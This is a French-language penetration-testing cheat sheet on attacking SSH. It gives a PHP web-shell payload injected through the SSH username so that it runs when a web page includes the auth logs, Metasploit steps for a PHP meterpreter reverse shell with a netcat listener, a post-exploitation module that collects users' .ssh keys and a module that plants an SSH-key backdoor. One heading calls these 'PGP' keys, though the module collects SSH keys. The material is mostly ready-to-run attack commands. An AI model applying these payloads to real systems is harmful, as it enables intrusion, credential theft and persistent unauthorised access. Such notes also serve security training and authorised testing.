SSH

Astuce :  La partie SSH est presque la même que la partie FTP, les partie b,c,d peuvent être appliquer sur le SSH 

  1. Payload Basiques SSH

On peut injecter du code php dans la connexion SSH. Très utile si on a accès aux logs ssh depuis une interface web par exemple. On peut ensuite aller voir les logs et donc exécuter le code que nous avons soumis. 

  • ssh ‘<?php system($_GET[‘c’]); ?>’@<ip>  #permet d’exécuter une commande

On peut ensuite gentiment demander à metasploit de nous créer un meterpreter en reverse tcp :

  • msfconsole
  • use exploit/multi/script/web_delivery
  • set target 1
  • set payload php/meterpreter/reverse_tcp
  • set lhost <VotreIP>
  • exploit
  1. Il suffit ensuite d’accéder aux logs pour executer votre shell php 
  • (var/auth/logs)
  1. Vous avez injecté dans la connection ssh 
  • (var/auth/logs&c=<votre commande> 
  1. Setup un Listener (nc -lnvp <port>)
  2. Coller la commande que metasploit vous a fourni 
  1. Exploit SSH en volant la PGP KEY

Si vous avez déjà exploité la cible et que vous avez un meterpreter dessus, vous pouvez utiliser la post exploitation de msf pour voler les clés autorisées.

Ce module collectera le contenu des répertoires .ssh de tous les utilisateurs sur la machine ciblée. De plus, les hôtes connus, les clés autorisées et tout autre fichier sont également téléchargés :

  • msfconsole 
  • use post/multi/gather/ssh_creds
  • msf post(ssh_creds) >set session 1
  • msf post(ssh_creds) >exploit
  1. Création d’une Backdoor 

Ce module ajoutera une clé SSH à un utilisateur spécifié (ou à tous), pour permettre la connexion à distance via SSH à tout moment.

  • msfconsole
  • use post/linux/manage/sshkey_persistence
  • msf post(sshkey_persistence) > set session 1
  • msf post(sshkey_persistence) >exploit